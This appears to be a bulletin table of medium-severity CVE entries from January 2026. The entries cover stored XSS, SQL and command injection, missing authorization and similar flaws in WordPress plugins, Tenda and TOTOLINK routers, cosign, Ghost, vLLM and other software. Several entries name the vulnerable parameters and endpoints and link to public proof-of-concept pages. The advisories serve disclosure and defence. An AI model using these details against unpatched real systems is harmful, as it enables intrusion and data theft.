| sergiotoca--STM Gallery 1.9 | The STM Gallery 1.9 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'composicion' parameter in all versions up to, and including, 0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13848 | https://www.wordfence.com/threat-intel/vulnerabilities/id/393d6e4a-af05-48ac-8921-f298932245a4?source=cve https://plugins.trac.wordpress.org/browser/stm-gallery/trunk/stmgallery_v.0.9.php#L121 https://plugins.trac.wordpress.org/browser/stm-gallery/tags/0.9/stmgallery_v.0.9.php#L121 |
| sfturing--hosp_order | A vulnerability was identified in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. Affected by this vulnerability is the function findOrderHosNum of the file /ssm_pro/orderHos/. Such manipulation of the argument hospitalAddress/hospitalName leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 6.3 | CVE-2025-15450 | VDB-339483 \| sfturing hosp_order orderHos findOrderHosNum sql injection VDB-339483 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #722925 \| https://github.com/sfturing/hosp_order hosp_order latest SQL Injection https://github.com/sfturing/hosp_order/issues/111 https://github.com/sfturing/hosp_order/issues/111#issue-3760306826 |
| sharethis--ShareThis Dashboard for Google Analytics | The ShareThis Dashboard for Google Analytics plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.4. This is due to the Google Analytics client_ID and client_secret being stored in plaintext in the publicly visible plugin source. This can allow unauthenticated attackers to craft a link to the sharethis.com server, which will share an authorization token for Google Analytics with a malicious website, if the attacker can trick an administrator logged into the website and Google Analytics to click the link. | 2026-01-07 | 4.7 | CVE-2025-12540 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6781dcc5-db95-43ca-9042-a3c05414b7e6?source=cve https://plugins.trac.wordpress.org/browser/googleanalytics/trunk/credentials.json?rev=3364575 |
| shoheitanaka--Japanized for WooCommerce | The Japanized for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `order` REST API endpoint in all versions up to, and including, 2.7.17. This makes it possible for unauthenticated attackers to mark any WooCommerce order as processed/completed. | 2026-01-09 | 5.3 | CVE-2025-14886 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4bf3248a-f235-472c-b751-96ac9838b27f?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-for-japan/tags/2.7.17/includes/gateways/paidy/class-wc-paidy-endpoint.php#L51 |
| SigmaPlugin--Advanced Database Cleaner PRO | Path Traversal: '.../...//' vulnerability in SigmaPlugin Advanced Database Cleaner PRO allows Path Traversal. This issue affects Advanced Database Cleaner PRO: from n/a through 3.2.10. | 2026-01-07 | 6.4 | CVE-2025-46256 | https://patchstack.com/database/wordpress/plugin/advanced-database-cleaner-pro/vulnerability/wordpress-advanced-database-cleaner-pro-plugin-3-2-10-limited-txt-path-traversal-vulnerability?_s_id=cve |
| sigstore--cosign | Cosign provides code signing and transparency for containers and binaries. Prior to versions 2.6.2 and 3.0.4, Cosign bundle can be crafted to successfully verify an artifact even if the embedded Rekor entry does not reference the artifact's digest, signature or public key. When verifying a Rekor entry, Cosign verifies the Rekor entry signature, and also compares the artifact's digest, the user's public key from either a Fulcio certificate or provided by the user, and the artifact signature to the Rekor entry contents. Without these comparisons, Cosign would accept any response from Rekor as valid. A malicious actor that has compromised a user's identity or signing key could construct a valid Cosign bundle by including any arbitrary Rekor entry, thus preventing the user from being able to audit the signing event. This issue has been patched in versions 2.6.2 and 3.0.4. | 2026-01-10 | 5.5 | CVE-2026-22703 | https://github.com/sigstore/cosign/security/advisories/GHSA-whqx-f9j3-ch6m https://github.com/sigstore/cosign/pull/4623 https://github.com/sigstore/cosign/commit/6832fba4928c1ad69400235bbc41212de5006176 |
| smjrifle--SVG Map Plugin | The SVG Map Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on multiple AJAX actions including 'save_data', 'delete_data', and 'add_popup'. This makes it possible for unauthenticated attackers to update the plugin's settings, delete map data, and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-13519 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5aaa97cc-4deb-43b6-957d-587834eca125?source=cve https://plugins.trac.wordpress.org/browser/svg-map-by-saedi/trunk/svg-map-by-saedi.php#L90 https://plugins.trac.wordpress.org/browser/svg-map-by-saedi/tags/1.0.0/svg-map-by-saedi.php#L90 |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains a cross-site scripting vulnerability in the 'senddata' POST parameter of logged_page.php that allows attackers to inject malicious scripts. Attackers can exploit this weakness by sending crafted POST requests to execute arbitrary HTML and script code in a victim's browser session. | 2026-01-07 | 6.1 | CVE-2019-25270 | Zero Science Lab Vulnerability Entry Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange SOCA Vendor Homepage |
| soniz--Curved Text | The Curved Text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'radius' parameter of the arctext shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13854 | https://www.wordfence.com/threat-intel/vulnerabilities/id/48514fdb-20c6-4a7f-8f60-e532ddd8853e?source=cve https://plugins.trac.wordpress.org/browser/curved-text/trunk/curved-text.php#L32 https://plugins.trac.wordpress.org/browser/curved-text/tags/0.1/curved-text.php#L32 |
| spree--spree | Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Authenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an authenticated user to retrieve other users' address information by modifying an existing order. By editing an order they legitimately own and manipulating address identifiers in the request, the backend server accepts and processes references to addresses belonging to other users, subsequently associating those addresses with the attacker's order and returning them in the response. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5. | 2026-01-08 | 6.5 | CVE-2026-22588 | https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72 https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3 https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8 https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7 |
| spwebguy--Responsive Pricing Table | The Responsive Pricing Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'plan_icons' parameter in all versions up to, and including, 5.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13418 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5d28fd23-fa86-4353-b1b4-af61192f8482?source=cve https://wordpress.org/plugins/dk-pricr-responsive-pricing-table/ |
| spwebguy--Responsive Pricing Table | The Responsive Pricing Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'table_currency' parameter in all versions up to, and including, 5.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-15058 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e20a34e5-6c1c-4f12-b1d8-aa4b40a5dd00?source=cve https://wordpress.org/plugins/dk-pricr-responsive-pricing-table/ |
| stevejburge--TaxoPress: Tag, Category, and Taxonomy Manager AI Autotagger | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the taxopress_ai_add_post_term function in all versions up to, and including, 3.41.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to add or remove taxonomy terms (tags, categories) on any post, including ones they do not own. | 2026-01-06 | 4.3 | CVE-2025-14371 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ef51ffb-df1e-442d-abc8-3a0308099a0b?source=cve https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/modules/taxopress-ai/classes/TaxoPressAiAjax.php#L681 |
| stylemix--MasterStudy LMS WordPress Plugin for Online Courses and Education | The MasterStudy LMS WordPress Plugin - for Online Courses and Education plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to missing capability checks on multiple REST API endpoints in all versions up to, and including, 3.7.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload or delete arbitrary media files, delete or modify posts, and create/manage course templates. | 2026-01-06 | 5.4 | CVE-2025-13766 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2719739a-90dc-470b-9270-8578e0cead59?source=cve https://plugins.trac.wordpress.org/changeset/3422825/ |
| techjewel--Fluent Forms Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder | The Fluent Forms - Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.1.7. This is due to missing capability checks on the `fluentform_ai_create_form` AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary forms via the publicly exposed AI builder. | 2026-01-07 | 5.3 | CVE-2025-13722 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7dbf179-7099-4dfb-8dad-780f996a7005?source=cve https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Ai/AiFormBuilder.php |
| Tenda--AC1206 | A vulnerability was determined in Tenda AC1206 15.03.06.23. Affected by this issue is the function formBehaviorManager of the file /goform/BehaviorManager of the component httpd. Executing a manipulation of the argument modulename/option/data/switch can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-05 | 6.3 | CVE-2026-0581 | VDB-339473 \| Tenda AC1206 httpd BehaviorManager formBehaviorManager command injection VDB-339473 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731193 \| Tenda AC1206 AC1206V1.0RTL_V15.03.06.23 Command Injection https://github.com/ccc-iotsec/cve-/blob/Tenda/Tenda%20AC1206%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md https://www.tenda.com.cn/ |
| tfrommen--Page Keys | The Page Keys plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_key' parameter in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-15000 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d3863ec-0cc7-4128-a19e-fc1e2c31195e?source=cve https://plugins.trac.wordpress.org/browser/page-keys/tags/1.3.3/inc/ListTable.php#L260 |
| themehigh--Email Customizer for WooCommerce Drag and Drop Email Templates Builder | The Email Customizer for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email template content in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in email templates that will execute when customers view transactional emails. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-13974 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c6927b4f-f47e-47fc-a5bf-b7fa42c31412?source=cve https://plugins.trac.wordpress.org/browser/email-customizer-for-woocommerce/tags/2.6.7/classes/inc/class-wecmf-general-template.php#L213 https://plugins.trac.wordpress.org/browser/email-customizer-for-woocommerce/trunk/classes/inc/class-wecmf-general-template.php#L213 |
| ThemeHunk--Oneline Lite | Missing Authorization vulnerability in ThemeHunk Oneline Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Oneline Lite: from n/a through 6.6. | 2026-01-07 | 4.3 | CVE-2025-69344 | https://patchstack.com/database/wordpress/theme/oneline-lite/vulnerability/wordpress-oneline-lite-theme-6-6-broken-access-control-vulnerability?_s_id=cve |
| themelocation--WP Popup Magic | The WP Popup Magic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter of the [wppum_end] shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13900 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c11a5f07-de89-47ec-a92e-2adc75965648?source=cve https://plugins.trac.wordpress.org/browser/wppopupmagic/trunk/class-wppum-frontend.php#L622 https://plugins.trac.wordpress.org/browser/wppopupmagic/tags/1.0.0/class-wppum-frontend.php#L622 |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_order_by_id() function in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enumerate order IDs and exfiltrate sensitive data (PII), such as student name, email address, phone number, and billing address. | 2026-01-08 | 6.5 | CVE-2025-13679 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0830d0c3-99c0-423e-99ab-f0c1cbec52d9?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/tags/3.9.4/ecommerce/OrderController.php |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability check on the 'bulk_action_handler' and 'coupon_permanent_delete' functions in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with subscriber level access and above, to delete, activate, deactivate, or trash arbitrary coupons. | 2026-01-09 | 4.3 | CVE-2025-13628 | https://www.wordfence.com/threat-intel/vulnerabilities/id/46f71f7b-7326-47b6-a23a-68a40f5bb56b?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/ecommerce/CouponController.php |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course enrollment in all versions up to, and including, 3.9.3. This is due to a missing capability check and purchasability validation in the `course_enrollment()` AJAX handler. This makes it possible for authenticated attackers, with subscriber level access and above, to enroll themselves in any course without going through the proper purchase flow. | 2026-01-09 | 4.3 | CVE-2025-13934 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5de212c9-5c2e-4713-b1ce-022dd84520c3?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course completion in all versions up to, and including, 3.9.2. This is due to missing enrollment verification in the 'mark_course_complete' function. This makes it possible for authenticated attackers, with subscriber level access and above, to mark any course as completed. | 2026-01-09 | 4.3 | CVE-2025-13935 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7b8b111a-9626-41f4-8a13-51f576af0257?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the catch_lp_ajax function in all versions up to, and including, 4.3.2. This makes it possible for unauthenticated attackers to modify course contents by adding/removing/updating/re-ordering sections or modifying section items. | 2026-01-06 | 5.3 | CVE-2025-13964 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae363511-8a1f-476a-9851-61f7763428c2?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/EditCurriculumAjax.php#L52 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/AbstractAjax.php#L18 |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin for WordPress is vulnerable to unauthorized file deletion in versions up to, and including, 4.3.2.2 via the /wp-json/lp/v1/material/{file_id} REST API endpoint. This is due to a parameter mismatch between the DELETE operation and authorization check, where the endpoint uses file_id from the URL path but the permission callback validates item_id from the request body. This makes it possible for authenticated attackers, with teacher-level access, to delete arbitrary lesson material files uploaded by other teachers via sending a DELETE request with their own item_id (to pass authorization) while targeting another teacher's file_id. | 2026-01-07 | 5.4 | CVE-2025-14802 | https://www.wordfence.com/threat-intel/vulnerabilities/id/884c4508-1ee1-4384-9fc2-29e2c9042426?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L527 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L405 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L77 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.3/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L403 |
| ThimPress--Thim Core | Cross-Site Request Forgery (CSRF) vulnerability in ThimPress Thim Core allows Cross Site Request Forgery. This issue affects Thim Core: from n/a through 2.3.3. | 2026-01-05 | 4.3 | CVE-2025-53344 | https://vdp.patchstack.com/database/wordpress/plugin/thim-core/vulnerability/wordpress-thim-core-plugin-plugin-2-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| tomiup--WP Recipe Manager | The WP Recipe Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Skill Level' input field in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13667 | https://www.wordfence.com/threat-intel/vulnerabilities/id/12b14418-28f0-4786-b8f8-a637fe007b6c?source=cve https://plugins.trac.wordpress.org/browser/wp-recipe-manager/trunk/inc/libs/class.metaboxes.php#L203 https://plugins.trac.wordpress.org/browser/wp-recipe-manager/tags/1.0.0/inc/libs/class.metaboxes.php#L203 |
| top-position--Top Position Google Finance | The Top Position Google Finance plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 0.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13895 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fcbf81f8-8b33-4b83-91fb-626b7b5f3bb2?source=cve https://plugins.trac.wordpress.org/browser/top-position-google-finance/trunk/top-position-google-finance.php#L78 https://plugins.trac.wordpress.org/browser/top-position-google-finance/trunk/top-position-google-finance.php#L56 |
| TOTOLINK--WA1200 | A vulnerability has been found in TOTOLINK WA1200 5.9c.2914. The impacted element is an unknown function of the file cstecgi.cgi of the component HTTP Request Handler. The manipulation leads to null pointer dereference. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-01-08 | 5.3 | CVE-2026-0731 | VDB-340128 (TOTOLINK WA1200 HTTP Request cstecgi.cgi null pointer dereference); CTI Indicators (IOB, IOC, IOA); Submit #733249 (TOTOLINK WA1200 V5.9c.2914 NULL Pointer Dereference); https://github.com/JackWesleyy/CVE/blob/main/WA1200/TOTOLINK%20WA1200%20NULL%20Pointer%20Dereference%20Vulnerability.md https://github.com/JackWesleyy/CVE/blob/main/WA1200/TOTOLINK%20WA1200%20NULL%20Pointer%20Dereference%20Vulnerability.md#poc https://www.totolink.net/ |
| TOTOLINK--WA300 | A security vulnerability has been detected in TOTOLINK WA300 5.2cu.7112_B20190227. This vulnerability affects the function sub_401510 of the file cstecgi.cgi. The manipulation of the argument UPLOAD_FILENAME leads to command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-01-06 | 6.3 | CVE-2026-0641 | VDB-339684 (TOTOLINK WA300 cstecgi.cgi sub_401510 command injection); CTI Indicators (IOB, IOC, TTP, IOA); Submit #732234 (TOTOLINK WA300 V5.2cu.7112_B20190227 Command Injection); https://github.com/JackWesleyy/CVE/blob/main/WA300/TOTOLINK_WA300_RCE.md https://github.com/JackWesleyy/CVE/blob/main/WA300/TOTOLINK_WA300_RCE.md#poc https://www.totolink.net/ |
| tox-dev--filelock | filelock is a platform-independent file lock for Python. Prior to version 3.20.3, a TOCTOU race condition vulnerability exists in the SoftFileLock implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the _acquire() method between raise_on_not_writable_file() (permission check) and os.open() (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. This issue has been patched in version 3.20.3. | 2026-01-10 | 5.3 | CVE-2026-22701 | https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0 https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5 |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.90.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's /ghost/api/admin/members/events endpoint allows users with authentication credentials for the Admin API to execute arbitrary SQL. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | 6.7 | CVE-2026-22596 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-gjrp-xgmh-x9qq https://github.com/TryGhost/Ghost/commit/cda236e455a7a30e828b6cba3c430e5796ded955 https://github.com/TryGhost/Ghost/commit/f2165f968bcdaae0e35590b38fa280ab03239391 |
| tugbucket--Multi-column Tag Map | The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 17.0.39 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14057 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f151cb44-499e-4b08-80fb-0a573594d624?source=cve https://plugins.trac.wordpress.org/browser/multi-column-tag-map/trunk/mctagmap_functions.php#L1845 https://plugins.trac.wordpress.org/browser/multi-column-tag-map/tags/17.0.39/mctagmap_functions.php#L1845 https://plugins.trac.wordpress.org/browser/multi-column-tag-map/tags/17.0.39/mctagmap-options.php#L65 |
| Ubiquiti Inc--UniFi Connect EV Station Lite | An Improper Access Control could allow a malicious actor within Wi-Fi range of the EV Station Lite (v1.5.2 and earlier) to use the WiFi AutoLink feature on a device that was only adopted via Ethernet. | 2026-01-05 | 5.3 | CVE-2026-21635 | https://community.ui.com/releases/Security-Advisory-Bulletin-059/0c0b7f7a-68b7-41b9-987e-554f4b40e0e6 |
| Ubiquiti Inc--UniFi Protect Application | A malicious actor with access to the adjacent network could overflow the UniFi Protect Application (Version 6.1.79 and earlier) discovery protocol causing it to restart. Affected Products: UniFi Protect Application (Version 6.1.79 and earlier). Mitigation: Update your UniFi Protect Application to Version 6.2.72 or later. | 2026-01-05 | 6.5 | CVE-2026-21634 | https://community.ui.com/releases/Security-Advisory-Bulletin-058-058/6922ff20-8cd7-4724-8d8c-676458a2d0f9 |
| ultimatemember--ForumWP Forum & Discussion Board | The ForumWP - Forum & Discussion Board plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the User's Display Name in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-13746 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f0eb6dc5-98e2-4d88-98f8-8a63c939b047?source=cve https://plugins.trac.wordpress.org/browser/forumwp/tags/2.1.5/assets/front/js/tooltip.js#L25 https://plugins.trac.wordpress.org/browser/forumwp/tags/2.1.5/includes/common/class-user.php#L906 https://plugins.trac.wordpress.org/browser/forumwp/tags/2.1.5/templates/user-card.php#L57 |
| viitorcloudvc--Viitor Button Shortcodes | The Viitor Button Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' shortcode attribute in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14113 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61488a15-b49f-4381-9a35-746c39f25967?source=cve https://plugins.trac.wordpress.org/browser/viitor-shortcodes/trunk/includes/class-ww-vcsc-shortcodes.php#L51 https://plugins.trac.wordpress.org/browser/viitor-shortcodes/tags/3.0.0/includes/class-ww-vcsc-shortcodes.php#L51 |
| vikasratudi--Page Expire Popup/Redirection for WordPress | The Page Expire Popup/Redirection for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' shortcode attribute in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 6.5 | CVE-2025-14153 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0c232b2-f7c8-4a8d-b282-72f61ecfc5da?source=cve https://plugins.trac.wordpress.org/browser/page-expire-popup/trunk/inc/vfpageexpirepopupstructure.php#L8 https://plugins.trac.wordpress.org/browser/page-expire-popup/tags/1.0/inc/vfpageexpirepopupstructure.php#L8 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3427583%40page-expire-popup&new=3427583%40page-expire-popup&sfp_email=&sfph_mail= |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0. | 2026-01-10 | 6.5 | CVE-2026-22773 | https://github.com/vllm-project/vllm/security/advisories/GHSA-grg2-63fw-f2qr |
| wedevs--weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot | The weDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.15 via the `/wp-json/wp/v2/docs/settings` REST API endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including third party services API keys. | 2026-01-09 | 5.3 | CVE-2025-14574 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cbca3d1e-0985-43d3-855e-eee07715f670?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/wedocs/tags/2.1.15&new_path=/wedocs/tags/2.1.16#file12 |
| wisdmlabs--AI BotKit AI Chatbot & Live Support for WordPress (No-Code) | The AI BotKit - AI Chatbot & Live Support for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in the `ai_botkit_widget` shortcode in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13887 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5659af1d-f248-46ff-b282-ef5397222d8d?source=cve https://plugins.trac.wordpress.org/browser/ai-botkit-for-lead-generation/trunk/includes/public/class-shortcode-handler.php#L42 https://plugins.trac.wordpress.org/browser/ai-botkit-for-lead-generation/tags/1.1.7/includes/public/class-shortcode-handler.php#L42 |
| woodpeckerleadform--Woodpecker for WordPress | The Woodpecker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'form_name' parameter of the [woodpecker-connector] shortcode in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13967 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1d99c8a8-daeb-402b-990d-6bacf6e9a780?source=cve https://plugins.trac.wordpress.org/browser/woodpecker/trunk/public/class-wfw-public.php#L109 https://plugins.trac.wordpress.org/browser/woodpecker/tags/3.0.4/public/class-wfw-public.php#L109 https://plugins.trac.wordpress.org/browser/woodpecker/trunk/public/partials/wfw-public-shortcode.php#L39 https://plugins.trac.wordpress.org/browser/woodpecker/tags/3.0.4/public/partials/wfw-public-shortcode.php#L39 |
| WP Swings--Wallet System for WooCommerce | Insertion of Sensitive Information Into Sent Data vulnerability in WP Swings Wallet System for WooCommerce allows Retrieve Embedded Sensitive Data. This issue affects Wallet System for WooCommerce: from n/a through 2.7.2. | 2026-01-05 | 6.3 | CVE-2025-68029 | https://vdp.patchstack.com/database/wordpress/plugin/wallet-system-for-woocommerce/vulnerability/wordpress-wallet-system-for-woocommerce-plugin-2-7-1-sensitive-data-exposure-vulnerability?_s_id=cve |
